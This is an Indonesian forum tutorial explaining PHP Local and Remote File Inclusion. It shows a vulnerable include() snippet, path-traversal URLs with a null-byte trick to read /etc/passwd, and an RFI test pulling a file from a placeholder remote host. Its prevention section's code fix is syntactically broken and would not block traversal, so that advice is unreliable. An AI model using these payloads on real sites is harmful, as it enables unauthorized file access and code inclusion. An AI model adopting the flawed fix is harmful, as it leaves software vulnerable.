Tutor singkat RFI & LFI

Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd bu
ang2 waktu :tongue:
Sebelumnya apa sih LFI dan RFI itu??
LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa
mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacke
r meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:
Code:
include();
include_once();
require();
require_once();
Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,

Code:
<?php
include "../$_GET[imagefile]";
?>
misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya
Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.

nah disini attacker akan dapat melakukan LFI karena variable imagefile di includ
e begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia aka
n mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan
jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut
.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa mengguna
kan metode menebak struktur folder dalam website target :lol:
tapi seandainya terdapat error seperti di bawah ini:
Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed
to open stream: No such file or directory in /their/web/root/index.php on line
2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang d
igunakan untuk include adalah seperti ini
Code:
Code:
<?php
include($_GET[imagefile].".php");
?>
nah untuk dapat mengelabui script tersebut kita bisa menggunakan %00 (dengan sya
rat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan %00 seper
ti
http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passw
d%00
lalu untuk apa %00? yaitu untuk menghilangkan karakter apapun setelah passwd.
* %00 ini disebut null injection.
Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bu
g RFI dengan menambahkan link file remote (dari luar website) pada variable imag
efile. misalnya:
http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt
dengan file evil.txt misal berisi "hacked by n4is3n"
jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut v
ulner terhadap bug RFI juga.

Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,
Code:
Code:
include("./"$_GET[imagefile].".php");
maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka has
ilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page
akan ditambah ./ di depannya.
http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt
dengan seperti ini server atau website yang diinject akan mencari file http://ww
w.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error b
ahwa tidak ditemukannya file tsb.
Semoga tutor sederhana dan sangat awam ini (Maklum, yg nulis jg msh awam) berman
faat. :smile:
*Referensi:
- Crawler
- http://en.wikipedia.org/local_file_incusion
- http://en.wikipedia.org/remote_file_inclusion
- Percobaan sendiri